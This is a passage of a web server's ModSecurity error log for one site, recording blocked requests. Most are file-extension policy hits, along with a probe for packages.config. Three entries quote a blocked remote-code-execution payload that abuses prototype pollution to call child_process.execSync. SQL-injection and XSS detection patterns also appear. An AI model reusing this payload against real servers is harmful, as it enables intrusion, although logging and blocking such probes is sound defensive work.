.dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/about-us/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_ETLJf01uCe8eluSsGPQAAAY8"] [Fri Apr 03 15:44:45.531910 2026] [:error] [pid 18547:tid 18558] [client 51.77.217.11:57434] [client 51.77.217.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_ETbJf01uCe8eluSsGPwAAAYg"] [Fri Apr 03 15:44:55.781555 2026] [:error] [pid 15948:tid 16036] [client 51.77.217.11:33886] [client 51.77.217.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_EV4wX7mV-z4TfJyLZTgAAARU"] [Fri Apr 03 18:19:33.591196 2026] [:error] [pid 15948:tid 16029] [client 74.7.241.42:56818] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_olYwX7mV-z4TfJyI57AAAAQ4"], referer: http://www.elavocato.net/ [Fri Apr 03 18:19:36.269937 2026] [:error] [pid 15948:tid 16026] [client 74.7.241.42:56818] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_omIwX7mV-z4TfJyI6EAAAAQs"], referer: http://www.elavocato.net/ar/about-us/ [Fri Apr 03 18:20:01.792800 2026] [:error] [pid 5223:tid 5232] [client 74.7.241.42:53344] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_osV_3yDgRlV3wDudRDgAAAMc"], referer: http://www.elavocato.net/en/about-us [Fri Apr 03 18:20:05.427507 2026] [:error] [pid 5223:tid 5230] [client 74.7.241.42:53344] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_otV_3yDgRlV3wDudRQAAAAMU"], referer: http://www.elavocato.net/en/service/2 [Fri Apr 03 18:20:08.546762 2026] [:error] [pid 5223:tid 5232] [client 74.7.241.42:53344] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac_ouF_3yDgRlV3wDudRZwAAAMc"], referer: http://www.elavocato.net/ar/service/7 [Fri Apr 03 18:21:13.948288 2026] [core:error] [pid 15948:tid 16017] [client 74.7.241.42:58936] AH10244: invalid URI path (/themes/primary/js/%url%), referer: http://www.elavocato.net/themes/primary/js/jquery.magnific-popup.min.js [Fri Apr 03 21:34:13.157772 2026] [:error] [pid 15948:tid 16021] [client 147.135.253.47:46484] [client 147.135.253.47] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/about-us/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adAWNYwX7mV-z4TfJyL3qAAAAQc"] [Fri Apr 03 21:34:15.520128 2026] [:error] [pid 15948:tid 16028] [client 147.135.253.47:46484] [client 147.135.253.47] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adAWN4wX7mV-z4TfJyL3tgAAAQ0"] [Fri Apr 03 21:34:30.577181 2026] [:error] [pid 5223:tid 5231] [client 147.135.253.47:55984] [client 147.135.253.47] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adAWRl_3yDgRlV3wDucrvgAAAMY"] [Sat Apr 04 13:25:20.522841 2026] [:error] [pid 6609:tid 6697] [client 13.43.86.154:44984] [client 13.43.86.154] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "elavocato.net"] [uri "/ar"] [unique_id "adD1INqfS3NFySZg697BSwAAARE"] [Sat Apr 04 13:25:20.555653 2026] [:error] [pid 6609:tid 6688] [client 13.43.86.154:44984] [client 13.43.86.154] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "elavocato.net"] [uri "/ar"] [unique_id "adD1INqfS3NFySZg697BTAAAAQk"] [Sat Apr 04 13:25:20.605403 2026] [:error] [pid 6609:tid 6704] [client 13.43.86.154:44984] [client 13.43.86.154] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "elavocato.net"] [uri "/ar"] [unique_id "adD1INqfS3NFySZg697BTQAAARY"] [Sat Apr 04 19:25:23.904761 2026] [:error] [pid 20578:tid 20590] [client 43.128.156.124:57308] [client 43.128.156.124] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adFJgzh7EGfB2lyFYwkkFAAAAMo"] [Sat Apr 04 21:49:56.451895 2026] [:error] [pid 21759:tid 21776] [client 74.7.241.42:45388] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adFrZBw49xiYi6Ae5e0uiQAAAU4"], referer: https://www.elavocato.net/ [Sat Apr 04 21:50:13.235547 2026] [:error] [pid 21759:tid 21768] [client 74.7.241.42:60246] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adFrdRw49xiYi6Ae5e0u3QAAAUY"], referer: https://www.elavocato.net/ar/our-team [Sat Apr 04 21:50:21.582472 2026] [:error] [pid 19536:tid 19653] [client 74.7.241.42:43978] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adFrfcncWDlTsNFoHHARUwAAAFY"], referer: https://www.elavocato.net/ar/service/17 [Sat Apr 04 21:50:48.302874 2026] [:error] [pid 6609:tid 6688] [client 74.7.241.42:43550] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adFrmNqfS3NFySZg6969uwAAAQk"], referer: https://www.elavocato.net/en/our-team [Sat Apr 04 21:50:53.576307 2026] [:error] [pid 6609:tid 6690] [client 74.7.241.42:43550] [client 74.7.241.42] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adFrndqfS3NFySZg6969_gAAAQs"], referer: https://www.elavocato.net/en/service/8 [Sat Apr 04 21:51:25.846919 2026] [core:error] [pid 19537:tid 19656] [client 74.7.241.42:46430] AH10244: invalid URI path (/themes/primary/js/%url%), referer: https://www.elavocato.net/themes/primary/js/jquery.magnific-popup.min.js [Sun Apr 05 00:28:29.492056 2026] [:error] [pid 6609:tid 6683] [client 212.86.126.157:37708] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/packages.config"] [unique_id "adGQjdqfS3NFySZg695_IgAAAQU"], referer: https://www.bing.com/ [Sun Apr 05 00:28:34.053762 2026] [:error] [pid 21759:tid 21779] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file 